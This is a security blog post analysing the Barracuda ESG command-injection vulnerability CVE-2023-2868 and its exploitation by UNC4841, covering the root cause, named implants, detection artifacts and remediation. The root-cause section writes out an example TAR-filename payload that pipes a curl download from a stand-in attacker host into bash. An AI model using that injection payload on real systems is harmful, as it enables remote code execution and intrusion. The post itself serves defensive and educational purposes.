Barracuda ESG CVE-2023-2868: The Zero-Day That Needed Hardware Replacement

Cybersecurity

Command injection in Barracuda ESG let APT UNC4841 root appliances so deeply that Barracuda issued an extraordinary directive: replace the physical hardware, not a software patch.

By Arjun Raghavan, Security & Systems Lead, BIPI · November 7, 2024 · 10 min read

CVE-2023-2868 is a remote code injection vulnerability in Barracuda Email Security Gateway (ESG) appliances, versions 5.1.3.001 through 9.2.0.006. The vulnerability exists in the module responsible for scanning TAR archive attachments in inbound emails. A specially crafted filename within a TAR file is processed by a Perl qx() call with unsanitized input, enabling command injection with the privileges of the email scanning process. CVSS 3.1 base score: 9.8.

Technical Root Cause: Perl qx() Injection

The TAR scanning code uses Perl's qx() function (equivalent to backtick execution) to invoke a system command that includes the archive's filename. Because the filename is taken directly from the TAR header without sanitization, a name containing shell metacharacters is expanded by the shell before execution. An attacker embeds a payload such as $(curl http://c2.evil/payload | bash) in the TAR member filename, and the scanning daemon executes it when processing the inbound email.

Affected Versions

• Barracuda ESG firmware 5.1.3.001 through 9.2.0.006 (all in this range)
• Barracuda ESG virtual appliances in addition to physical hardware
• Barracuda Email Security Service (cloud SaaS) is NOT affected
• Other Barracuda product lines are NOT affected by this specific CVE

Threat Actor UNC4841 and Campaign Scope

Mandiant (now Google Cloud Security) attributed exploitation to UNC4841, a China-nexus threat actor assessed to conduct cyber espionage in support of the People's Republic of China. The actor began exploiting CVE-2023-2868 as early as October 2022, eight months before Barracuda disclosed the vulnerability. The campaign targeted government agencies, military contractors, defense industrial base organizations, and telecommunications companies across North America, Europe, and the APAC region.

• Deployed SALTWATER: a Trojanized Barracuda SMTP module with backdoor capabilities
• Deployed SEASPY: a passive backdoor masquerading as a Barracuda persistence service
• Deployed SEASIDE: a module enabling reverse shell via SMTP HELO/EHLO commands
• Deployed SUBMARINE: a novel multi-component backdoor residing in SQL database tables
• Maintained access through multiple persistence mechanisms simultaneously

UNC4841's most sophisticated implant, SUBMARINE, lived entirely within the SQL database of the ESG appliance. It had no file-system presence, making it invisible to standard file-based forensics and surviving OS-level remediation attempts.

Why Barracuda Ordered Hardware Replacement

In an unprecedented move, Barracuda issued guidance in June 2023 instructing all affected ESG customers to physically decommission and replace their appliances, even after patching. The rationale was that UNC4841's persistence mechanisms, particularly SUBMARINE, were embedded so deeply in the device firmware and database that no software-only remediation could provide sufficient confidence in the device's integrity. The recommendation was repeated in subsequent advisories.

Detection Artifacts

• Unusual outbound connections from ESG to non-Barracuda external IP addresses
• Presence of files named score.txt, modules.conf, or bsmtpd in unexpected paths
• SMTP HELO strings containing encoded payloads (SEASIDE backdoor trigger)
• Database entries in Barracuda internal tables not matching Barracuda's schema
• Unexplained increases in ESG memory usage or process counts

Remediation and Recovery

1. Follow Barracuda's directive and replace the physical ESG appliance
2. Preserve a forensic image of the old appliance before decommissioning
3. Rotate all credentials that transited the compromised ESG (email accounts, LDAP bind accounts)
4. Review email logs for evidence of data exfiltration during the exposure window
5. Deploy the replacement appliance on a new network segment with fresh configuration
6. Engage Mandiant or equivalent IR firm if government sector or classified data is involved

Structural Lessons for Email Security Appliances

• Treat email security appliances as high-value targets requiring equivalent monitoring to endpoints
• Subscribe to vendor security notifications with next-business-day response SLAs
• Establish playbooks for appliance replacement, not just software patching
• Log all outbound connections from email security infrastructure to SIEM

Read more field notes, explore our services, or get in touch at info@bipi.in. Privacy Policy · Terms.